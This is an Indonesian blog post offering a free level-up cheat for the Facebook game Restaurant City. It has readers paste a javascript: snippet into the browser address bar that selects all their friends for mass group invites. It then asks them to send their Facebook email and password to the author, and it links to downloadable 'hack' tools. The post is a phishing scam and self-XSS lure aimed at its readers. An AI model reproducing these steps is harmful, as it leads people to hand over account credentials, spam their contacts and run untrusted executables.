Jasa Cheat facebook restaurant city GRATIS
hy all yg maen restaurant city...
maybe bnyak ya yang lg nyari nyari cheat restaurant city .. wew malangnya kalo g ktmu..
namun skrang blog ne udh buka jasa cheat restoran city khusus menaikan 5 level pada resto...
cara nya adalah :
1.buka facebook lalu add gw uzumaki julianto
2.lalu search grup Cheat HacK CracK
3. gabung lalu invite tmn lw semua
4.invitenya kalo baek hati semua orang ya..
5. wew capek ya nge invite banyak orang pake javascript ni ja

javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] === 'object'){fs.click(elms[fid]);}}
6. copy code diatas lalu paste ke address bar lalu klik enter
7. jangan heran yang keluar bukannya alamat laen namun tmn lw semuanya udh terpilih
8. lalu abis ntu klik invite lalu kirim pesan ke gw msukin email n pass lewat pesan ..
gw g bakal hack dech soal'a gw udh sring cheaten org yang petso..


takut kena hack gampank dech gw ada koq cheat na hehehe...
alat yang dibutuhkan:
piaip hack : http://ul.to/z4oq8l
automation : http://ul.to/ck9mc5

1.login facebook
2. buka resto
3. tunggu ampe loading selesai
4. ketika ntu buka piaip hack.
5. pilih semua cheat (centang semua cheat)
6. pilih browser mu
7. fast scan di pojok kiri atas diilangin lalu klik patch
8. buka auto mation
9.ganti bahasanya jadi inggris ( di kanannya ntu kea ada bendera diklik ja )
10. klik browser yang kamu pake (ada flock,firefox,IE,google atw google chrome)
11. klik low scan
12. tunggu ampe selesai lalu klik 4000
13. liat ja akibatnya
14. tiap kali ada yang bayr dpat exp 4000
Label: edit post
0 Responses

Posting Komentar